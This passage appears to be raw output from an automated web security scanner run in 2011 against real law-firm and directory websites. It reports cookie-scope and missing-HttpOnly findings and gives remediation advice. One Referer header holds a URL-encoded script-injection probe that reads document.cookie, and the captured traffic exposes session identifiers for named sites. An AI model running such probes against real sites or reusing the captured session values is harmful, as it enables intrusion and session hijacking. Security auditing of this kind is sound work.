GET /dubai HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /industries HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insite HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /international HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jblount HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/act_ticker_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
<images>
<item> <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news> <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&article_id=9405&site_id=286< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsTicker.swf HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/dc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /offices HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /seminars/act_eventbanner_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /washington%20dc%20law%20firms HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Washington-DC/Attorneys HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 19 Jan 2011 15:13:37 GMT Status: 301 Moved Permanently Server: nginx Content-Type: text/plain Location: http://www.yellowpages.com/washington-dc/attorneys Content-Length: 9 X-Urid: d-9ca453f0-060c-012e-b0d1-001e0be96752 Expires: Wed, 19 Jan 2011 15:13:36 GMT Cache-Control: no-cache Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT Connection: close
moved to
10. Cookie without HttpOnly flag set
There are 237 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /domainserve/domainView HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arnoldporter.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263646;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/ Set-Cookie: CFTOKEN=41801191;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chamber/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 19 Jan 2011 15:48:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /404.aspx?error=500 Set-Cookie: ASP.NET_SessionId=ld121hju5gt2vlvrg5m2cm45; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 136
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/404.aspx?error=500'>here</a>.</h2> </body></html>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dc HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
